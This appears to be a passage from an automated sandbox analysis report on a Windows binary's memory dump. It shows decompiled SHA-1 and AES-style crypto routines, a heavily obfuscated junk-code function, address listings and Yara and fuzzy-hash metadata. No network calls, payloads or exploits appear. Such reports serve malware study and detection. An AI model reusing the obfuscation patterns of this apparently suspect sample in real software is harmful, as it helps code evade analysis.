				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00409e4b
0x00409e4f
0x00409e51
0x00409e51
0x00409e54
0x00409e76
0x00409e9c
0x00409ec2
0x00409ee4
0x00409eeb
0x00409eee
0x00409ef1
0x00409efa
0x00409f00
0x00409f07
0x00409f18
0x00409f1b
0x00409f1e
0x00409f22
0x00409f24
0x00409f26
0x00409f2f
0x00409f32
0x00409f35
0x00409f40
0x00409f46
0x00409f48
0x00409f48
0x00409f4b
0x00409f4e
0x00409f4e
0x00409f53
0x00409f55
0x00409f58
0x00409f5b
0x00409f61
0x00409f64
0x00409f67
0x00409f70
0x00409f76
0x00409f7f
0x00409f8e
0x00409f95
0x00409f98
0x00409f9b
0x00409fa4
0x00409fa7
0x00409faa
0x00409fc2
0x00409fc9
0x00409fcb
0x00409fce
0x00409fd1
0x00409fda
0x00409fe1
0x00409fe4
0x00409fe7
0x00409ff6
0x00409ffd
0x0040a000
0x0040a003
0x0040a00c
0x0040a016
0x0040a019
0x0040a025
0x0040a028
0x0040a02f
0x0040a032
0x0040a035
0x0040a03a
0x0040a03d
0x0040a046
0x0040a057
0x0040a05a
0x0040a05d
0x0040a064
0x0040a067
0x0040a06a
0x0040a06d
0x0040a06f
0x0040a072
0x0040a075
0x0040a07e
0x0040a083
0x0040a083
0x0040a098
0x0040a09b
0x0040a09e
0x0040a0a5
0x0040a0a8
0x0040a0ab
0x0040a0c0
0x0040a0c7
0x0040a0ca
0x0040a0ce
0x0040a0d1
0x0040a0d6
0x0040a0d9
0x0040a0e8
0x0040a0eb
0x0040a0f2
0x0040a0f5
0x0040a0f8
0x0040a0fb
0x0040a0fe
0x0040a106
0x0040a114
0x0040a117
0x0040a11a
0x0040a11a
0x0040a121
0x0040a124
0x0040a127
0x0040a12f
0x0040a13d
0x0040a140
0x0040a147
0x0040a14a
0x0040a14d
0x0040a150
0x0040a153
0x0040a15c
0x0040a163
0x0040a163
0x0040a169
0x0040a182
0x0040a185
0x0040a18c
0x0040a18f
0x0040a192
0x0040a1a4
0x0040a1ae
0x0040a1b1
0x0040a1ba
0x0040a1bd
0x0040a1c4
0x0040a1c7
0x0040a1cd
0x0040a1e0
0x0040a1e7
0x0040a1ea
0x0040a1ed
0x0040a1f0
0x0040a1f9
0x0040a1fc
0x0040a20f
0x0040a212
0x0040a21c
0x0040a21f
0x0040a221
0x0040a22a
0x0040a22d
0x0040a240
0x0040a246
0x0040a249
0x0040a250
0x0040a252
0x0040a255
0x0040a258
0x0040a25b
0x0040a25e
0x0040a261
0x0040a26a
0x0040a26f
0x0040a272
0x0040a272
0x0040a285
0x0040a288
0x0040a28b
0x0040a292
0x0040a295
0x0040a298
0x0040a29b
0x0040a2ae
0x0040a2b1
0x0040a2bc
0x0040a2bf
0x0040a2cb
0x0040a2ce
0x0040a2d4
0x0040a2d7
0x0040a2da
0x0040a2e1
0x0040a2f1
0x0040a2f4
0x0040a2fa
0x0040a2fd
0x0040a304
0x0040a306
0x0040a309
0x0040a30c
0x0040a30f
0x0040a312
0x0040a319
0x0040a328
0x0040a32b
0x0040a332
0x0040a335
0x0040a338
0x0040a33b
0x0040a33e
0x0040a341
0x0040a344
0x0040a34d
0x0040a35e
0x0040a366
0x0040a36c
0x0040a36f
0x0040a371
0x0040a374
0x0040a377
0x0040a384

Strings

(, xrefs: 0040A15C

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00417164, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

Ae{l, xrefs: 004171D7

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Ae{l
API String ID: 0-3292488897
Opcode ID: 7ea6961ee1de6c5cf2b075a4e01ede65308ea961d84d55b45f4d5730f8208721
Instruction ID: ebd60a3d2f3ded1b04ce07315a9f1805e97b3e351aba50871cac1bd12d865e89
Opcode Fuzzy Hash: 7ea6961ee1de6c5cf2b075a4e01ede65308ea961d84d55b45f4d5730f8208721
Instruction Fuzzy Hash: 0241B83655D6529BC3228E7889811E6BFB5FA52310B1447EAD4C14F223C732C88BC794

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x00402fb0
0x00402fbf
0x00402fc8
0x00402fd6
0x00402fda
0x00402fe3
0x00402ff4
0x00402ff7
0x00402ffc
0x00403005
0x00403013
0x00403018
0x00403021
0x00403031
0x00403051
0x00403054
0x00403066
0x0040306b
0x00403080
0x0040309d
0x004030a0
0x004030b1
0x004030c6
0x004030e6
0x004030e9
0x004030fb
0x00403119
0x00403136
0x00403139
0x0040314b
0x00403160
0x00403166
0x0040316e
0x0040316f
0x00403172
0x00403180
0x00403190
0x004031a2
0x004031b4
0x004031d0
0x004031e3
0x004031f0
0x00403201
0x00403218
0x0040323a
0x0040323d
0x0040324e
0x00403269
0x00403280
0x00403283
0x00403295
0x0040329d
0x004032b2
0x004032cf
0x004032d2
0x004032e3
0x00403307
0x00403317
0x0040331a
0x0040332c
0x00403344
0x00403347
0x0040335a
0x00403367
0x00403379
0x00403391
0x004033b4
0x004033b7
0x004033c9
0x004033de
0x004033e4
0x004033e4
0x004033e7
0x004033e7
0x00403180
0x0040344b
0x00403454
0x00403462
0x004034c0
0x004034c9
0x004034d7
0x00403539
0x00403542
0x0040354f
0x00403552
0x0040359e
0x004035aa
0x004035b3
0x004035c0
0x004035c7

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 0041D360, Relevance: .4, Instructions: 370
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E0041D360(signed int __eax, signed char __ebx, void* __ecx, void* __edx, signed int __edi, signed int __esi) {
				signed int _t45;
				signed char _t46;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t56;

				_t53 = __esi;
				_t52 = __edi;
				_t46 = __ebx;
				_t45 = __eax & 0xd31aba3e;
				_t55 = _t54 |  *0xe42c61b9;
				asm("rcr dword [0x21f386a9], 0xc5");
				 *0x50438acd =  *0x50438acd ^ __edi;
				if(( *0x41dfe61d & _t45) == 0) {
					__eflags =  *0x8a83dc7a & __ecx;
					 *0xe00c5294 =  *0xe00c5294 ^ __esp;
					asm("adc ch, [0x2866ba2a]");
					asm("rcr dword [0xcd38cabd], 0x90");
					asm("adc [0xe5a5e2fb], eax");
					__edx = __edx +  *0xa646d82d;
					__bh = __bh - 0xb7;
					 *0x4cd57bb7 =  *0x4cd57bb7 | __ah;
					asm("ror dword [0x553e4062], 0xef");
					 *0xbb1fdfd5 =  *0xbb1fdfd5 - __ecx;
					__ebp = __ebp -  *0x43a68d0f;
					__eflags =  *0x44c79de6 & __ah;
					asm("rcl byte [0x8352a7ca], 0x61");
					 *0xeda702cb =  *0xeda702cb >> 0x8c;
					_push( *0xeb3f3e68);
					asm("stosb");
					asm("ror byte [0x51c46be0], 0x5f");
					asm("movsb");
					asm("cmpsb");
					asm("ror byte [0x976d5322], 0xb");
					__edx = __edx +  *0xe63294f8;
					 *0x99513ce1 =  *0x99513ce1 >> 0x46;
					asm("adc ebx, [0x2cde7aed]");
					asm("ror dword [0x2dee49b8], 0x24");
					asm("adc eax, [0x940b13c5]");
					__eflags = __edi -  *0x52059c93;
					asm("adc [0x6ab1e5d7], bl");
					__esi = __esi &  *0xdad57205;
					asm("rol dword [0x2a056aa9], 0x59");
					asm("movsw");
					__eflags =  *0x56a9eba - __esi;
					 *0xb2b05ae2 = __ah;
					__esp =  *0x4d92056a * 0xb0ac;
					__esi =  *0xac02056a * 0xa0c8;
					_pop( *0x2119036a * 0x415);
					__ebx = __ebx -  *0x4b8eb27;
					 *0xb8ec1a1f =  *0xb8ec1a1f >> 0x6b;
					 *0xe6045904 - __ch =  *0x50604b8 & __edx;
					_t11 = __ch;
					__ch =  *0xc905b8e4;
					 *0xc905b8e4 = _t11;
					__edx = __edx ^  *0x6a949781;
					 *0xc4c5c505 = __esi;
					__esp =  *0x4d92056a * 0x0000b0ac &  *0x56a9e;
					asm("scasd");
					__ebx = 0x76a9cbd;
					asm("adc [0x5eebedfb], edx");
					__ebx = 0x76a9cbe;
					__ch =  *0xc905b8e4 + 0xb2;
					_push( *0xaa9507bf);
					 *0xb43e3db5 =  *0xb43e3db5 + __al;
					 *0xe72607bf =  *0xe72607bf + __esi;
					asm("scasb");
					__ebp = __ebp - 0xbfae3427;
					__eflags =  *0x5e9ec307 & __esi;
					asm("adc ebp, [0xbfb611cc]");
					asm("sbb [0x4453908], dl");
					__edi =  *0x581e6a6a * 0x8c9;
					__ebx = 0x76a9cbf;
					__esi = __esi +  *0x73476b31;
					__esp =  *0x4d92056a * 0x0000b0ac &  *0x56a9e | 0x08c96aa3;
					 *0xfea9d5e5 = __bl;
					 *0xc95f44d1 =  *0xc95f44d1 - 0x76a9cbd;
					asm("sbb dh, 0x8");
					__ecx =  *0x3d4b196b * 0xa777;
					__eflags = __ecx - 0x409c966;
					asm("stosd");
					__ebp = __ebp |  *0xc6b28fbe;
					__eflags = __ebp;
					if(__eflags != 0) {
						__esi =  *0x98bd374;
						_t14 = __esp;
						__esp =  *0x7b9d5967;
						 *0x7b9d5967 = _t14;
						if(__eflags >= 0) {
							asm("adc ecx, [0xbb579678]");
							asm("sbb ecx, 0xc7c7098b");
							 *0xb2a7621b =  *0xb2a7621b >> 0xa9;
							__eflags =  *0xb2a7621b;
							if( *0xb2a7621b > 0) {
								__edi =  *0xa8bd07e * 0xe74b;
								__ebx = 0x76a9cbf |  *0xce6f2cc0;
								asm("rcl dword [0xf3d4bdfa], 0x99");
								__eflags = __ebp - 0x824c6e0b;
								if(__ebp < 0x824c6e0b) {
									__ebp = __ebp ^ 0x681cb273;
									 *0x727ac9b6 =  *0x727ac9b6 & __bh;
									asm("rcr byte [0xbcafd508], 0x8a");
									 *0x5e42cd95 =  *0x5e42cd95 ^ __eax;
									 *0x4dbd11c9 =  *0x4dbd11c9 | __dh;
									__eflags =  *0x4dbd11c9;
									if( *0x4dbd11c9 == 0) {
										__ebp = __ebp +  *0xba7e177b;
